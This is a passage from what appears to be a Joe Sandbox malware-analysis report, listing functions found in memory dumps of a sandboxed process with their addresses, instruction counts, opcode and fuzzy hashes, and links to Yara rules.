              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 407aeee04bec8d34c924baf193bb9f0169f2c70ea83534d2006a81cf78c6c291
              • Instruction ID: 13aee7401204fb396a5183f143a4bce4d2e123c707044dcdc6304d5339a954de
              • Opcode Fuzzy Hash: 407aeee04bec8d34c924baf193bb9f0169f2c70ea83534d2006a81cf78c6c291
              • Instruction Fuzzy Hash: D491D5B1A19A0D8FEB59EA78C449AB977E1EF58300F50017AD40EC7292DE25EC46CB85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF776E1 Relevance: .3, Instructions: 261COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73c618c7b5aa6289831d7f7d8e69fbd4e0cf5a5f599910ceefd32cbfc49ed2dc
              • Instruction ID: d88267449e25b9603f7c35fbb25cf121abc5174467e454e24976053c74bebe98
              • Opcode Fuzzy Hash: 73c618c7b5aa6289831d7f7d8e69fbd4e0cf5a5f599910ceefd32cbfc49ed2dc
              • Instruction Fuzzy Hash: AAA1D5B0D19A1D8FDB95EBB8C459AADB7B1FF58300F5044B9D40DE3292CE39A985CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF70ED1 Relevance: .2, Instructions: 223COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15ad21e08023b0811461b11fbf27ef58d2e71663479f712e40d14e4cf3daba52
              • Instruction ID: b568a6ffeade089fa5df1cf855826d0a3cd768e785a424ded91a1b5437146196
              • Opcode Fuzzy Hash: 15ad21e08023b0811461b11fbf27ef58d2e71663479f712e40d14e4cf3daba52
              • Instruction Fuzzy Hash: 6A911AB0D1961D8BDB44EBA8C8597EDB7B2FF58300F1041A9D50DE7292CE356C85CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6D00D Relevance: .2, Instructions: 218COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf4d268315f195747bef8a520d08b60f7d57264a0a805f2572a15ee9d6b4348e
              • Instruction ID: 13113e655954025104aa318a63d31eef82725533c33057ed1f7307ba854a3474
              • Opcode Fuzzy Hash: cf4d268315f195747bef8a520d08b60f7d57264a0a805f2572a15ee9d6b4348e
              • Instruction Fuzzy Hash: FD81DAB050AB868FD356CF34C1885A177E2FF55314B50497DC89AC7A96DB3AF846CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a65eb80fc283cd2d6bf03035f992e903c99c2d8af4f7983d0c0f2abd10456b1
              • Instruction ID: ae9e1e157cce0d38577567fbb3549c68d75f9959619bdc8ab3096c8f5b2effbc
              • Opcode Fuzzy Hash: 0a65eb80fc283cd2d6bf03035f992e903c99c2d8af4f7983d0c0f2abd10456b1
              • Instruction Fuzzy Hash: 9071C2B2E18A4D8FEB88DB6CE4557FC7BE1EF4A310F40017AC10DD769ADA651806CB42
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7EB60 Relevance: .2, Instructions: 213COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17406df949edbd1d456e198f43224b8e97fb3bfa77e670d24018406531ef053d
              • Instruction ID: a73892e027ef9179d9cc3f882a60eb604d17b33dc26e957f30bb2518ce0d7ede
              • Opcode Fuzzy Hash: 17406df949edbd1d456e198f43224b8e97fb3bfa77e670d24018406531ef053d
              • Instruction Fuzzy Hash: 3D518CA2B0DE0A0FEB96D63C841D6BA7BD1EF98350B44017ED40EC31A7DD19EC068795
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62FAB Relevance: .2, Instructions: 209COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ae999681ae9196efcfd03320f624ca2ca147d01c55c771e38d8277ba70543cb
              • Instruction ID: 8c8b16f62612bd3fc553e18cbf4aad4edc834c97038bf756a7177b9955f00a63
              • Opcode Fuzzy Hash: 8ae999681ae9196efcfd03320f624ca2ca147d01c55c771e38d8277ba70543cb
              • Instruction Fuzzy Hash: C381C5B0D1965D8EEBA5EF78C8587ACB6B1FB58300F1045B9D40DE3291DB35A988CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A938 Relevance: .2, Instructions: 207COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba4cc67087b378375c03c1a93fce133c810c9e8eda9b3852f1edbfdeef81f8c4
              • Instruction ID: 1bdb294520c3c2892b27173d481f04f0264dd0068fb0d0caaf2610bc78878c0a
              • Opcode Fuzzy Hash: ba4cc67087b378375c03c1a93fce133c810c9e8eda9b3852f1edbfdeef81f8c4
              • Instruction Fuzzy Hash: F16104B0E0992D8FEB95EB68C4997FDB7E1FB59300F50017AD50DE3282DE35A9848B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF78331 Relevance: .2, Instructions: 182COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8aa035d6a56013118dd8d74ed410b6240e79c89f2c1f66e9b3c8be569608c43d
              • Instruction ID: cab2e9f732e75ee830b1deca6ee09f9997a6f7d3f19822c47d390b309d1e61b8
              • Opcode Fuzzy Hash: 8aa035d6a56013118dd8d74ed410b6240e79c89f2c1f66e9b3c8be569608c43d
              • Instruction Fuzzy Hash: 6661A5B0D1991D8EEB95EB68C858BACB7F1FF59310F6001BAD40DE3291DA75A9848B10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7ED70 Relevance: .2, Instructions: 179COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1fd3624d29cc6bb856bb0a0e452a16e9d363ace507811b38e50717aa0b5c3fc5
              • Instruction ID: 975ef5db59c1c6d03eaff615d4942fd04cd4d808a38a50ea8f6431f3d066478e
              • Opcode Fuzzy Hash: 1fd3624d29cc6bb856bb0a0e452a16e9d363ace507811b38e50717aa0b5c3fc5
              • Instruction Fuzzy Hash: C85137B1A09A0E4FE749EB38C8899B637D1FF99310B5082B9D94DC7157CE29F806C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BCE9 Relevance: .2, Instructions: 175COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 699aee97aaaf41b2148c3a934f51fe276084be5c3ec587988b9a70ce01b5bbce
              • Instruction ID: bde7a96253c6e780c0fbe945c94417c78faf50f4ec3759dd228d953505bc5f5b
              • Opcode Fuzzy Hash: 699aee97aaaf41b2148c3a934f51fe276084be5c3ec587988b9a70ce01b5bbce
              • Instruction Fuzzy Hash: E75106B0E0996D8FEB95DB78D8597FCB7A1FF59300F5001BAC50DE3282DA29AD458B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7EB08 Relevance: .2, Instructions: 174COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50f18e9614f1a9623755b7b21957bb464174d282bc44ae3ba78164c52fa4ebc1
              • Instruction ID: 120f301991d43a7ee049e911d86ad39356f83c6e25786dc131cf75d0e8a53f10
              • Opcode Fuzzy Hash: 50f18e9614f1a9623755b7b21957bb464174d282bc44ae3ba78164c52fa4ebc1
              • Instruction Fuzzy Hash: 034119B1A19E4E0FEB99DB38D85967977D1FF59300B4005BEE40DC71D2DE29E8068351
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF646A0 Relevance: .2, Instructions: 173COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18616037cddd4afc11f7e53d6e76baa82ca5172eee04a5602a575686191eb64e
              • Instruction ID: 1c959bbe68d6cd0d71c3640b89f87e04f0115119a08d54a1e7ebee421d24d2fe
              • Opcode Fuzzy Hash: 18616037cddd4afc11f7e53d6e76baa82ca5172eee04a5602a575686191eb64e
              • Instruction Fuzzy Hash: 2E5109B090995D8EEB95EB78C859BADBBF1FF69310F10016AD40DE3291DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF69668 Relevance: .2, Instructions: 163COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83f4d4eda728cb86959f4fbdd341d16516fa30e5684ad0560243b945f5136576
              • Instruction ID: f0aae7372c0fd3137c48a551a69ac6bc8fe9936670984d1bc7767dd49b08bc1d
              • Opcode Fuzzy Hash: 83f4d4eda728cb86959f4fbdd341d16516fa30e5684ad0560243b945f5136576
              • Instruction Fuzzy Hash: 7E4105E1A1FA874FE32A8B38E4494787791EF84314B24067ED84ECB186DD3AF8498651
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6AEA1 Relevance: .2, Instructions: 162COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 952c57bcae46e0163de77a4cb479e52a029f4cf6775eef3f47a91d1aca89431f
              • Instruction ID: e7c9db04e9d393d318f29b25ac2c68a45be4f0c84356bb040c9e7a53d60bd962
              • Opcode Fuzzy Hash: 952c57bcae46e0163de77a4cb479e52a029f4cf6775eef3f47a91d1aca89431f
              • Instruction Fuzzy Hash: 594139F160D6854FE71A9A38D44A5B577D0FF46310F10017ED88BD3141DB36F81B8292
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7A540 Relevance: .2, Instructions: 158COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b448a56c48d5137d8ac8667645f91328f44204c540ee72cc20d2033d66f83465
              • Instruction ID: 0e3e0af4ee489f5e396f492c22b51c552049db9ce86e68f028de9c5d2a865e10
              • Opcode Fuzzy Hash: b448a56c48d5137d8ac8667645f91328f44204c540ee72cc20d2033d66f83465
              • Instruction Fuzzy Hash: 255124F290DA898FF725CB78D8096AD7FD0EF52310F14417FE08D97192DA25A80A8752
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7A4A2 Relevance: .2, Instructions: 157COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b3f49290dad5c336e1cd39da9604be0a4548102856e8eab3dcec832df954324b
              • Instruction ID: 7a0f2c6ef94de60971009b2f601948c4fee04cb088d39cb3a99d91dcdb646ba7
              • Opcode Fuzzy Hash: b3f49290dad5c336e1cd39da9604be0a4548102856e8eab3dcec832df954324b
              • Instruction Fuzzy Hash: F841F7B290DB884FE725CB78D8596E97FE0EF52320F14416FD1CD8B153EA25A80A8752
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6A7F5 Relevance: .2, Instructions: 155COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4252119918af754233485695452b57aed35520843054e15421881415c4a584f6
              • Instruction ID: 451d16447e1c81e025f8190bb5cd1f35defa1b3cbb8c1899530d27e71d8d2775
              • Opcode Fuzzy Hash: 4252119918af754233485695452b57aed35520843054e15421881415c4a584f6
              • Instruction Fuzzy Hash: 2941E5F1A19A4A4FD749EA38C4956B4B7D1FF54310F044279D90ED3282DF39E84687C0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52035 Relevance: .1, Instructions: 142COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b179e069caada4c729197f37c304f568763223edcd43f59831ccd031aaaae91a
              • Instruction ID: 463dfd721f9af1a294f2b5976f2dcbe53765c7fdf1f2eaf75fd193afecbcd15a
              • Opcode Fuzzy Hash: b179e069caada4c729197f37c304f568763223edcd43f59831ccd031aaaae91a
              • Instruction Fuzzy Hash: A74124B190E64E4FE746DB38D4591B97BE1EF45300F0502BAE90DC31A3DE29EC4A8341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF74CE0 Relevance: .1, Instructions: 140COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14729118039ae49a1c807460806c562db6403bfba5f4b4457b7eb078787777f6
              • Instruction ID: 313bee99cc6a0f87bb503640dd6bdfee8791ba6418a55ef43d6e024d12255290
              • Opcode Fuzzy Hash: 14729118039ae49a1c807460806c562db6403bfba5f4b4457b7eb078787777f6
              • Instruction Fuzzy Hash: CB51F5B0D096198EEB95EF78C4587EDBBB1EB58310F608079D40DE3281CE79A9888F41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF518F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de91a8a6e3e04d9bf5cc17878b613857adfe1cfd6a8e1b1386c98b2ad6258ec5
              • Instruction ID: 894517ce0b6cb0059383e0aac081e1e86fceefea73d838e35011d0d99204d67a
              • Opcode Fuzzy Hash: de91a8a6e3e04d9bf5cc17878b613857adfe1cfd6a8e1b1386c98b2ad6258ec5
              • Instruction Fuzzy Hash: 1141A3B0B187498BCB4DDE28C89647A77E1FF98714B14857DD58BC3296CE35E842CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF523AA Relevance: .1, Instructions: 132COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32e02b59a30a0a0ca0967caf0902387a06380acadcd519163cc2f19e6c9356b2
              • Instruction ID: 018f4707f7a42d29c41801321f109c4c440e514fb58db1a876feb76c06e4111a
              • Opcode Fuzzy Hash: 32e02b59a30a0a0ca0967caf0902387a06380acadcd519163cc2f19e6c9356b2
              • Instruction Fuzzy Hash: DE3128F280D54E0FE756DB34D8854E5B7D1EF55320F0403BADA48CB0A6DA2AED8A83D1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF77A87 Relevance: .1, Instructions: 132COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b68d989f780446aeb6d13f249d3ba7b5a9e51592fe6a850c6173029ad2ff41b
              • Instruction ID: 1f1371b54f90ace05d0d87ce224e69979343e42a69ab7dfa629a352abb2eba68
              • Opcode Fuzzy Hash: 0b68d989f780446aeb6d13f249d3ba7b5a9e51592fe6a850c6173029ad2ff41b
              • Instruction Fuzzy Hash: 47414FB1D1991D8FDBA9DB68CC997E9B7F0FB68311F0001EAC44DE3651CA355A84CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF61E58 Relevance: .1, Instructions: 121COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 750a15d47fd93a66e82151448ff08d0f4dcc11d29adf983ca263da2a89349375
              • Instruction ID: 7336b4c2bdb3f93987aeaa8b6ba740695f6b65736e66b88d5a212f83d3262ee2
              • Opcode Fuzzy Hash: 750a15d47fd93a66e82151448ff08d0f4dcc11d29adf983ca263da2a89349375
              • Instruction Fuzzy Hash: F5411CB4D1956D8FEB45EBA8C8996FDB7B1FF58300F404139E509E3292CE35A845CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF530F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 643bd2220a72cef2c1de3ed671a339e1fc8bf0a80d223ddb7edf8f5bb6a9c1ec
              • Instruction ID: ce8633ef704822ad1e9f9c3ab7635ba3268a0cff1717267b919617f6da7e97be
              • Opcode Fuzzy Hash: 643bd2220a72cef2c1de3ed671a339e1fc8bf0a80d223ddb7edf8f5bb6a9c1ec
              • Instruction Fuzzy Hash: 02417DF0D0A60E8FEB55DBB8C4596FD77F0EF45300F01013AD909E6282DA3AA94D8B51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9ec0a4df65a42d8339958f9e8ddcbbcd2a8a965284d83bfddc3aba377da59e0f
              • Instruction ID: 95d04fe7a604aa6ecd298bba0d35a76a9d3386b498e663ab24c2ed1d673d22ea
              • Opcode Fuzzy Hash: 9ec0a4df65a42d8339958f9e8ddcbbcd2a8a965284d83bfddc3aba377da59e0f
              • Instruction Fuzzy Hash: 824127B0D0965D8FDB51DFB8C4486EDB7F0EF19311F10417AE909E7292DA39A948CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF67EAA Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c1225175b588deb400ee7e7fb04d25ed54037991e2de209fa35464e74d7704fc
              • Instruction ID: 7a8acc4f0b6eb0a7479b6293c22c78a9197732350ec57913fbf62c5de7c6206e
              • Opcode Fuzzy Hash: c1225175b588deb400ee7e7fb04d25ed54037991e2de209fa35464e74d7704fc
              • Instruction Fuzzy Hash: 5C3152F1D0999DCEEBA5DB28C845BE973B1FB24300F1041AAC41DD7141DA35A949CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6FC17 Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b39ca8c043408ca89487cf05ff4869cbb3f8c6357bb6fd335f042feb8511594
              • Instruction ID: 90fb1779285a2f3ec4bbc7f53e2a914630703295e93894b652ea6e2b378dd602
              • Opcode Fuzzy Hash: 8b39ca8c043408ca89487cf05ff4869cbb3f8c6357bb6fd335f042feb8511594
              • Instruction Fuzzy Hash: EA31E2B0D0862D8FDBA9EF68C4556ECB7B1FF59301F5005A9D00DE3292CA39AA85CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7748C Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93caf22d1229326a46575223da46c5216c05df7e9fc933d4d1b364d9bcd4dd62
              • Instruction ID: ec7f786dd74660745d6d5c86a67a7437968c1cb990d2371928b0be9544a94d9d
              • Opcode Fuzzy Hash: 93caf22d1229326a46575223da46c5216c05df7e9fc933d4d1b364d9bcd4dd62
              • Instruction Fuzzy Hash: CC31BCE181E78A8FE3039B74C8595AD7FE0EF57310B1500FBD488CB0A3D929A909C761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6ECD1 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 12667aaeb4744bc0ff05746f4d8db400c678fe2c93433f9ffc70e854942cbcac
              • Instruction ID: c1596384780ab9afce968da4d8da0b2661b4e72ffaa99c25722825dc43c28c00
              • Opcode Fuzzy Hash: 12667aaeb4744bc0ff05746f4d8db400c678fe2c93433f9ffc70e854942cbcac
              • Instruction Fuzzy Hash: 2D315AB1D1995D8FEB45EB78C4996FDB7B0EF58301F40047AE40AE7292DE35A445CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF77CE5 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7af1d1b2b9611f48ceb41cca968e4d740e4b9817e768a9962651bdc23d18b86b
              • Instruction ID: 623f0f51a97c9dc5499b8a40881caa05d4807947cf8d8a87f87a6fff0c5ea09b
              • Opcode Fuzzy Hash: 7af1d1b2b9611f48ceb41cca968e4d740e4b9817e768a9962651bdc23d18b86b
              • Instruction Fuzzy Hash: 98317CB0C0A64ACFE752DB74C948BBEBBF0EF16310F1545B6C408D7192DA79A948CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6A4C1 Relevance: .1, Instructions: 91COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
